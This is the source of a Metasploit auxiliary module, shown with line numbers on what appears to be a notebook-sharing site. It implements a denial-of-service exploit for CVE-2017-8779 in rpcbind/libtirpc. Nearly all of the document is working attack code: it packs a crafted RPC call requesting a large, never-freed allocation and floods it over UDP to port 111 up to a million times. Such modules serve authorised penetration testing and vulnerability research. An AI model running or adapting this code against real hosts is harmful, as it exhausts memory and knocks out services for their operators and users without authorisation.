Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Auxiliary::Dos
8
  include Msf::Auxiliary::Report
9
  include Msf::Auxiliary::UDPScanner
10

11
  def initialize(info={})
12
    super(update_info(info,
13
      'Name'        => 'RPC DoS targeting *nix rpcbind/libtirpc',
14
      'Description' => %q{
15
        This module exploits a vulnerability in certain versions of
16
        rpcbind, LIBTIRPC, and NTIRPC, allowing an attacker to trigger
17
        large (and never freed) memory allocations for XDR strings on
18
        the target.
19
      },
20
      'Author'  =>
21
        [
22
          'guidovranken', # original code
23
          'Pearce Barry <pearce_barry[at]rapid7.com>' # Metasploit module
24
        ],
25
      'License' => MSF_LICENSE,
26
      'References' => [
27
        [ 'CVE', '2017-8779' ],
28
        [ 'BID', '98325' ],
29
        [ 'URL', 'http://openwall.com/lists/oss-security/2017/05/03/12' ]
30
      ],
31
      'Disclosure Date' => 'May 03 2017'))
32

33
    register_options([
34
      Opt::RPORT(111),
35
      OptInt.new('ALLOCSIZE', [true, 'Number of bytes to allocate', 1000000]),
36
      OptInt.new('COUNT', [false, "Number of intervals to loop", 1000000])
37
    ])
38
  end
39

40
  def scan_host(ip)
41
    pkt = [
42
      0,        # xid
43
      0,        # message type CALL
44
      2,        # RPC version 2
45
      100000,   # Program
46
      4,        # Program version
47
      9,        # Procedure
48
      0,        # Credentials AUTH_NULL
49
      0,        # Credentials length 0
50
      0,        # Credentials AUTH_NULL
51
      0,        # Credentials length 0
52
      0,        # Program: 0
53
      0,        # Ver
54
      4,        # Proc
55
      4,        # Argument length
56
      datastore['ALLOCSIZE'] # Payload
57
    ].pack('N*')
58

59
    s = udp_socket(ip, datastore['RPORT'])
60
    count = 0
61
    while count < datastore['COUNT'] do
62
      begin
63
        s.send(pkt, 0)
64
      rescue ::Errno::ENOBUFS, ::Rex::ConnectionError, ::Errno::ECONNREFUSED
65
        vprint_error("Host #{ip} unreachable")
66
        break
67
      end
68
      count += 1
69
    end
70

71
    vprint_good("Completed #{count} loop(s) of allocating #{datastore['ALLOCSIZE']} bytes on host #{ip}:#{datastore['RPORT']}")
72
  end
73
end
74

75